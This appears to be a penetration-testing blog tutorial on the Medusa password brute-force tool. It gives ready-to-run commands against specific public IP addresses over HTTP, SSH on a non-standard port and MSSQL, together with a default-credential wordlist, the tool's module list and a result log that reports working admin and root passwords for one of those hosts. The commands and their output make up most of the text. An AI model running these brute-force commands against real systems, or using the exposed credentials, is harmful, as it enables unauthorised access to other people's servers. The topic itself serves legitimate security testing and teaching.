Brute force attacks with Medusa

Written By Celal Erdik

There are many tools (medusa, hydra, bruter, metasploit aux modular, etc.) to be used for brute force attacks, which are constantly needed in penetration tests. In this article, we will show you how to use Medusa and how we can try the desired user accounts through different services.

For example, by reading the requested usernames and passwords from the file, performing bruteforce on the HTTP service (TCP/80) (trying the username as empty and the username as password (-e ns)), writing the successful findings to the result.txt file and sending it to 10 simultaneous requests ( medusa command by sending -t 10):

root@bt:~/Desktop# medusa -U user.txt -P pass.txt -M http -h 140.127.190.184 -t 10 -e ns -O result.txt

The result file will log the start and end time of the scan, as well as the user information that was successfully found or the results that gave an unknown error.

root@bt:~/Desktop# cat result.txt

#Medusa v.2.1.1 (2013-02-09 22:03:58)

# medusa -U user.txt -P pass.txt -M http -h 140.127.190.184 -t 10 -e ns -O result.txt

ACCOUNT FOUND: [http] Host: 140.127.190.184 User: admin Password: 1234 [SUCCESS]

ACCOUNT FOUND: [http] Host: 140.127.190.184 User: root Password: 1234 [SUCCESS]

# Medusa has finished (2013-02-09 22:04:18).

Among the services that do not run on the default port, a brute force attack can be performed on the service related to Medusa. For example, a bruteforce attack against the SSH service running on port 443 (-n) instead of the default SSH port:

root@bt:~/Desktop# medusa -U user.txt -P pass.txt -M ssh -h 85.95.238.172 -n 443 -t 10 -O result.txt -e ns

The -C command should be used to export usernames and passwords from a single file. The content of the userpass.txt used is as follows

:admin:admin

:admin:1234

:admin:adminadmin

:radware:radware

:test:test

:test:test123

:admin:123456

:admin:12345678

:test:test

:admin:A12345

:admin:A123456

:admin:qwerty

root@bt:~/Desktop# medusa -C userpass.txt -M ssh -h 85.95.238.172 -n 443 -t 10 -O result.txt -e ns

With the -d parameter, all services that can be bruteforced on Medusa can be listed. When writing the service name to be used with the -M parameter, it is written without the .mod extension. So for http.mod it is enough to say -M http.

root@bt:~/Desktop# medusa -d

Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

Available modules in "." :

Available modules in "/usr/local/lib/medusa/modules":

+ cvs.mod : Brute force module for CVS sessions : version 2.0

+ ftp.mod : Brute force module for FTP/FTPS sessions : version 2.1

+ http.mod : Brute force module for HTTP : version 2.0

+ imap.mod : Brute force module for IMAP sessions : version 2.0

+ mssql.mod : Brute force module for M$-SQL sessions : version 2.0

+ mysql.mod : Brute force module for MySQL sessions : version 2.0

+ ncp.mod : Brute force module for NCP sessions : version 2.0

+ nntp.mod : Brute force module for NNTP sessions : version 2.0

+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0

+ pop3.mod : Brute force module for POP3 sessions : version 2.0

+ postgres.mod : Brute force module for PostgreSQL sessions : version 2.0

+ rexec.mod : Brute force module for REXEC sessions : version 2.0

+ rlogin.mod : Brute force module for RLOGIN sessions : version 2.0

+ rsh.mod : Brute force module for RSH sessions : version 2.0

+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.0

+ smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 2.0

+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0

+ snmp.mod : Brute force module for SNMP Community Strings : version 2.1

+ ssh.mod : Brute force module for SSH v2 sessions : version 2.0

+ svn.mod : Brute force module for Subversion sessions : version 2.0

+ telnet.mod : Brute force module for telnet sessions : version 2.0

+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0

+ vnc.mod : Brute force module for VNC sessions : version 2.1

+ web-form.mod : Brute force module for web forms : version 2.1

+ wrapper.mod : Generic Wrapper Module : version 2.0

To query how to use any module (for web-form service), a command like the following can be used;

root@bt:~/Desktop# medusa -M web-form -q

Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

web-form.mod (2.1) Luciano Bello <luciano@linux.org.ar> :: Brute force module for web forms

Available module options:

USER-AGENT:? User-agent value. Default: "I'm not Mozilla, I'm Ming Mong".

FORM:? Target form to request. Default: "/"

DENY-SIGNAL:? Authentication failure message. Attempt flagged as successful if text is not present in

server response. Default: "Login incorrect"

CUSTOM-HEADER:? Custom HTTP header.

More headers can be defined by using this option several times.

FORM-DATA:<METHOD>?<FIELDS>

Methods and fields to send to web service. Valid methods are GET and POST. The actual form

data to be submitted should also be defined here. Specifically, the fields: username and

password. The username field must be the first, followed by the password field.

Default: "post?username=&password="

Usage example: "-M web-form -m USER-AGENT:"g3rg3 gerg" -m FORM:"webmail/index.php" -m DENY-SIGNAL:"deny!"

-m FORM-DATA:"post?user=&pass=&submit=True" -m CUSTOM-HEADER:"Cookie: name=value"

A command similar to the following can be used for a brute force attack on the Mssql server.

root@bt:~/Desktop# medusa -C userpass.txt -M mssql -h 85.95.237.14 -t 10 -O result.txt -e ns -T 20

Celal Erdik
Previous

Session Fixation Vulnerability
Next

Multi Service Usage via Single Port